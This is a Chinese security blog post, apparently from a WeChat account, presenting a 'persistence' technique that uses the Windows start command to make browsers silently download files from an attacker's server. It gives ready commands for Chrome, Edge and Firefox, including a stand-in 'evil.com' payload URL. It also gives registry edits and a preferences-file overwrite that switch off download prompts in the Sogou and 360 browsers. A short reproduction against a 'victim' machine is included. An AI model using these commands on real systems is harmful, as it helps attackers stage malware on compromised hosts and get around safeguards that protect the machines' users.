免责声明

本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者及本公众号不为此承担任何责任。

start命令

在Windows的CMD命令行中，start命令用于启动一个新的命令行窗口或打开一个新的程序。

start命令的用法：

• start "" "C:Some Pathmyfile.txt"：这将会用默认程序（在这个例子中，可能是记事本或Word等）打开这个文件。
• start "" "C:Program FilesMy Programprogram.exe"：这将会启动指定的程序。
• start "" "http://www.example.com"：这将会打开默认的网页浏览器，并导航到指定的网址。
• start：直接打开cmd
• start chrome：打开处于环境变量中的程序

尝试直接执行"start"，打开了一个新的cmd窗口：

尝试执行"start chrome"，将打开谷歌浏览器：

通过浏览器下载文件

我们输入"start chrome" + url，就会控制谷歌浏览器并打开url

并且，浏览器有一个特性：我们通过浏览器打开特定后缀的文件时，浏览器会自动帮我们下载到本地。

因此，执行类似"start chrome http://evil.com/evil.rar"之类的命令，浏览器就会下载evil.rar至本地。

复现

1. 找台机器准备好恶意文件，并打开http server监听端口：

2. 受害者机器执行"start chrome http://172.18.207.162:7894/fatmo.jpg"，没有下载文件，说明jpg格式不会自动下载

3. 受害者机器执行"start chrome http://172.18.207.162:7894/fatmo.rar",rar格式文件会自动下载，复现成功：

常见浏览器下载方式总结

chrome浏览器下载较为简单，而有些浏览器则会涉及到一些复杂操作才能完成下载，现在总结几个常见浏览器的下载方式：

• msedge

start msedge http://192.168.1.1:6789/demo.rar

• firefox

start firefox http://192.168.1.1:6789/demo.rar

• chrome

start chrome http://192.168.1.1:19900/6789.rar

• 搜狗浏览器

reg add "HKCUSoftwareSogouSogouExplorerDownloaderDownload" /v DirectDownload /t REG_DWORD /d 0x1 /f
reg add "HKCUSoftwareSogouSogouExplorerCommon" /v SlienceDownloadEnabled /t REG_DWORD /d 0x1 /f
start "C:Program Files (x86)SogouSogouExplorerSogouExplorer.exe" http://192.168.1.1:6789/demo.rar

• 360安全浏览器

# 查看当前 prompt_for_download 配置：
type "C:UsersAdministratorAppDataRoaming360se6User DataDefaultPreferences " | findstr prompt_for_download
# 覆写配置文件：
echo {"download":{"intro_suda_show":true,"prompt_for_download":false}} > "C:UsersAdministratorAppDataRoaming360se6User DataDefaultPreferences"
# 使用360安全浏览器下载文件：
start C:UsersAdministratorAppDataRoaming360se6Application360se.exe http://192.168.111.1/123.rar

参考文章

• https://xz.aliyun.com/t/12953

• https://mp.weixin.qq.com/s/b3NNiXk7tFJPtq3yuWc7pQ

原文始发于微信公众号（赛博安全狗）：【权限维持技术】Windows利用浏览器进行远程下载